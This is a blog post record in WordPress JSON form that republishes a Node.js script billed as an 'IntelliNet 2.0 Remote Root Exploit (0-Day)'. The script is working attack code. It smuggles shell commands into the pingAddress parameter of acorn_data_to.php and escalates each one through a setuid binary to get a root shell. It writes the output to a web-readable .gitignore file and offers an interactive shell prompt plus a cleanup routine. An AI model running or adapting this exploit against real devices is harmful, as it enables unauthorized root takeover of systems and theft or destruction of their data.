{"id":59388,"date":"2024-09-02T20:20:54","date_gmt":"2024-09-02T17:20:54","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/181241\/intellinet20-exec.txt"},"modified":"2024-09-02T20:20:54","modified_gmt":"2024-09-02T17:20:54","slug":"intellinet-2-0-remote-root","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/intellinet-2-0-remote-root\/","title":{"rendered":"IntelliNet 2.0 Remote Root"},"content":{"rendered":"<p>#!\/usr\/local\/bin\/node<br \/>const { execSync } = require(&#8216;child_process&#8217;);<br \/>const readline = require(&#8216;readline&#8217;);<\/p>\n<p>let TARGET = &#8221;;<br \/>let COMMAND = &#8221;;<br \/>let SESSION = &#8221;;<\/p>\n<p>const ESCALATE = &#8216;\/usr\/aes\/bin\/exec_suid&#8217;;<\/p>\n<p>console.log(`<br \/>\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2840\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800<br \/>\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u28a0\u28fe\u2844\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800<br \/>\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2880\u28fc\u28ff\u28e7\u28f6\u28f6\u28f6\u28e6\u28e4\u28c0\u2840\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800<br \/>\u2800\u2800\u2800\u2800\u2800\u2800\u28e0\u28fe\u28bf\u28ff\u28ff\u28ff\u28cf\u2809\u2809\u281b\u281b\u283f\u28f7\u28d5\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800<br \/>\u2800\u2800\u2800\u2800\u28e0\u28fe\u289d\u2804\u2880\u28ff\u287f\u283b\u28ff\u28c4\u2800\u2800\u2800\u2800\u2808\u28bf\u28e7\u2840\u28c0\u28e4\u287e\u2800\u2800\u2800<br \/>\u2800\u2800\u2800\u28b0\u28ff\u2861\u2801\u2800\u2800\u28ff\u2847\u2800\u2838\u28ff\u28fe\u2846\u2800\u2800\u28c0\u28e4\u28ff\u28ff\u280b\u2801\u2800\u2800\u2800\u2800<br \/>\u2800\u2800\u2880\u28f7\u28ff\u2803\u2800\u2800\u28b8\u28ff\u2847\u2800\u2800\u2839\u28ff\u28f7\u28f4\u287e\u281f\u2809\u2838\u28ff\u2847\u2800\u2800\u2800\u2800\u2800<br \/>\u2800\u2800\u28b8\u28ff\u2817\u2840\u2800\u2800\u28b8\u28ff\u2803\u28e0\u28f6\u28ff\u283f\u28bf\u28ff\u2840\u2800\u2800\u2880\u28ff\u2847\u2800\u2800\u2800\u2800\u2800<br \/>\u2800\u2800\u2818\u287f\u2844\u28c7\u2800\u28c0\u28fe\u28ff\u287f\u281f\u280b\u2801\u2800\u2808\u28bb\u28f7\u28c6\u2844\u28b8\u28ff\u2847\u2800\u2800\u2800\u2800\u2800<br \/>\u2800\u2800\u2800\u28bb\u28f7\u28ff\u28ff\u283f\u28ff\u28e7\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u283b\u28ff\u28f7\u28ff\u285f\u2800\u2800\u2800\u2800\u2800\u2800<br \/>\u2880\u28f0\u28fe\u28ff\u283f\u28ff\u28ff\u28fe\u28ff\u2807\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2880\u28fc\u28ff\u28ff\u28c5\u2800\u2800\u2800\u2800\u2800\u2800<br \/>\u2800\u2830\u280a\u2801\u2800\u2819\u282a\u28ff\u28ff\u28f6\u28e4\u28c4\u28c0\u28c0\u28c0\u28e4\u28f6\u28ff\u281f\u280b\u2819\u28bf\u28f7\u2844\u2800\u2800\u2800\u2800<br \/>\u2800\u2800\u2800\u2800\u2800\u2800\u2880\u28ff\u285f\u283a\u282d\u282d\u283f\u283f\u283f\u281f\u280b\u2801\u2800\u2800\u2800\u2800\u2819\u280f\u28e6\u2800\u2800\u2800<br \/>\u2800\u2800\u2800\u2800\u2800\u2800\u28b8\u285f\u2803\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800<br \/>\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2801\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800<\/p>\n<p>\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557<br \/>\u2551 IntelliNet 2.0 Remote Root Exploit (0-Day) \u2551<br \/>\u2551 Author: Jean Pereira &lt;info@cytres.com&gt; \u2551<br \/>\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d<\/p>\n<p>`);<\/p>\n<p>const cleanUp = () =&gt; {<br \/>execSync(<br \/>`curl -sL &#8220;http:\/\/${TARGET}\/acorn_data_to.php?cmd=ping-tool&amp;pingAddress=127.0.0.1;rm%20.gitignore;&#8221;`<br \/>);<br \/>};<\/p>\n<p>const createShell = (cmd) =&gt; {<br \/>execSync(<br \/>`curl -sL &#8220;http:\/\/${TARGET}\/acorn_data_to.php?cmd=ping-tool&amp;pingAddress=127.0.0.1;${encodeURIComponent(<br \/>[ESCALATE, cmd].join(&#8216; &#8216;)<br \/>)}%20%3E%20.gitignore;&#8221;`<br \/>);<br \/>return execSync(`curl -sL &#8220;http:\/\/${TARGET}\/.gitignore&#8221;`).toString().trim();<br \/>};<\/p>\n<p>const rl = readline.createInterface({<br \/>input: process.stdin,<br \/>output: process.stdout,<br \/>});<\/p>\n<p>const interactiveShell = () =&gt; {<br \/>rl.question(`root@${SESSION.slice(8)}:~# `, (currentCommand) =&gt; {<br \/>if (currentCommand.trim() === &#8216;!q&#8217;) {<br \/>console.log(&#8216;Cleaning up&#8230;&#8217;);<br \/>cleanUp();<br \/>rl.close();<br \/>} else {<br \/>COMMAND = currentCommand;<br \/>let output = createShell(COMMAND);<br \/>console.log(output);<br \/>interactiveShell(); <br \/>}<br \/>});<br \/>};<\/p>\n<p>rl.question(&#8216;[*] Enter target IP: &#8216;, (targetIP) =&gt; {<br \/>TARGET = targetIP;<br \/>SESSION = createShell(&#8216;echo a1b2c3d4$HOSTNAME&#8217;);<br \/>if (!SESSION.startsWith(&#8216;a1b2c3d4&#8217;)) {<br \/>console.log(&#8216;[*] Could not execute payload, aborting&#8217;);<br \/>process.exit(0);<br \/>} else {<br \/>console.log(&#8216;[*] Payload injected to firmware&#8217;);<br \/>console.log(&#8216;[*] Launching root shell via exec_suid&#8217;);<br \/>}<br \/>console.log(&#8221;);<br \/>interactiveShell();<br \/>});<\/p>\n<p>rl.on(&#8216;close&#8217;, () =&gt; {<br \/>process.exit(0);<br \/>});<\/p>\n","protected":false},"excerpt":{"rendered":"<p>#!\/usr\/local\/bin\/nodeconst { execSync } = require(&#8216;child_process&#8217;);const readline = require(&#8216;readline&#8217;); let TARGET = &#8221;;let COMMAND = &#8221;;let SESSION = &#8221;; const ESCALATE = &#8216;\/usr\/aes\/bin\/exec_suid&#8217;; console.log(`\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2840\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u28a0\u28fe\u2844\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2880\u28fc\u28ff\u28e7\u28f6\u28f6\u28f6\u28e6\u28e4\u28c0\u2840\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u28e0\u28fe\u28bf\u28ff\u28ff\u28ff\u28cf\u2809\u2809\u281b\u281b\u283f\u28f7\u28d5\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u28e0\u28fe\u289d\u2804\u2880\u28ff\u287f\u283b\u28ff\u28c4\u2800\u2800\u2800\u2800\u2808\u28bf\u28e7\u2840\u28c0\u28e4\u287e\u2800\u2800\u2800\u2800\u2800\u2800\u28b0\u28ff\u2861\u2801\u2800\u2800\u28ff\u2847\u2800\u2838\u28ff\u28fe\u2846\u2800\u2800\u28c0\u28e4\u28ff\u28ff\u280b\u2801\u2800\u2800\u2800\u2800\u2800\u2800\u2880\u28f7\u28ff\u2803\u2800\u2800\u28b8\u28ff\u2847\u2800\u2800\u2839\u28ff\u28f7\u28f4\u287e\u281f\u2809\u2838\u28ff\u2847\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u28b8\u28ff\u2817\u2840\u2800\u2800\u28b8\u28ff\u2803\u28e0\u28f6\u28ff\u283f\u28bf\u28ff\u2840\u2800\u2800\u2880\u28ff\u2847\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2818\u287f\u2844\u28c7\u2800\u28c0\u28fe\u28ff\u287f\u281f\u280b\u2801\u2800\u2808\u28bb\u28f7\u28c6\u2844\u28b8\u28ff\u2847\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u28bb\u28f7\u28ff\u28ff\u283f\u28ff\u28e7\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u283b\u28ff\u28f7\u28ff\u285f\u2800\u2800\u2800\u2800\u2800\u2800\u2880\u28f0\u28fe\u28ff\u283f\u28ff\u28ff\u28fe\u28ff\u2807\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2880\u28fc\u28ff\u28ff\u28c5\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2830\u280a\u2801\u2800\u2819\u282a\u28ff\u28ff\u28f6\u28e4\u28c4\u28c0\u28c0\u28c0\u28e4\u28f6\u28ff\u281f\u280b\u2819\u28bf\u28f7\u2844\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2880\u28ff\u285f\u283a\u282d\u282d\u283f\u283f\u283f\u281f\u280b\u2801\u2800\u2800\u2800\u2800\u2819\u280f\u28e6\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u28b8\u285f\u2803\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2801\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800 \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\u2551 IntelliNet 2.0 Remote Root Exploit (0-Day) \u2551\u2551 Author: Jean Pereira &lt;info@cytres.com&gt; \u2551\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d `); const cleanUp = () =&gt; {execSync(`curl -sL &#8220;http:\/\/${TARGET}\/acorn_data_to.php?cmd=ping-tool&amp;pingAddress=127.0.0.1;rm%20.gitignore;&#8221;`);}; const createShell = (cmd) =&gt; {execSync(`curl -sL &#8220;http:\/\/${TARGET}\/acorn_data_to.php?cmd=ping-tool&amp;pingAddress=127.0.0.1;${encodeURIComponent([ESCALATE, cmd].join(&#8216; &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59388","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59388","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59388"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59388\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59388"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59388"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59388"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}